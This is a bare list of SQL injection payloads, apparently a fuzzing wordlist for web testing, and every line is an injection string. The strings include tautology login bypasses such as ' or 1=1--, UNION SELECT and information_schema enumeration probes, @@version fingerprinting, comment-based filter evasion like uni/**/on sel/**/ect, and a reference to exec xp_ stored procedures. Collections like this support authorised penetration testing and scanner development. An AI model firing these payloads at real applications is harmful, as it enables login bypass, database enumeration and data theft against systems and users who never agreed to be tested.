'
0 or 1=1
1'1
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 exec sp_ (or exec xp_)
1 or 1=1
1 or 1=2
1;SELECT%20*
a'
a' or '
a" or 1=1--
a' or 1=1--
a" or 1=2--
a' or 1=2--
a' or 3=3--
a' or 'a' = 'a
a' OR 'x'='x
hi or 1=1 --"
hi' or 1=1 --
hi or a=a
hi' or 'a'='a
hi') or ('a'='a
'hi' or 'x'='x';
hi' or 'x'='x';
' or ''='
' or 0=0 #
' or 0=0 --
' or 1 --'
' or '1'='1'--
' or 1=1
' or 1=1 --
' or 1=1--
/**/or/**/1/**/=/**/1
; or '1'='1'
or 1=1
or 1=1--
' or 1=1 or ""=
' or 1=1 or ''='
or 1=1 or ""=
' or 1 in (select @@version)--
' or 3=3
' or 3=3 --
' or ""a""=""a"
' or 'a'='a
' or a = a
' or a=a
' or a=a--
' order by
' or (EXISTS)
' or isNULL(1/0) /*
' or 'text' = n'text'
' or 'text' > 't'
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
' or username like char(37);
' select * from information_schema.tables--
' UNION ALL SELECT
' UNION ALL SELECT @@version--
' uni/**/on sel/**/ect
' UNION SELECT
) union select * from information_schema.tables;
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND email IS NULL; --
x' AND members.email IS NULL; --
x' AND userid IS NULL; --
x' or 1=1 or 'x'='y
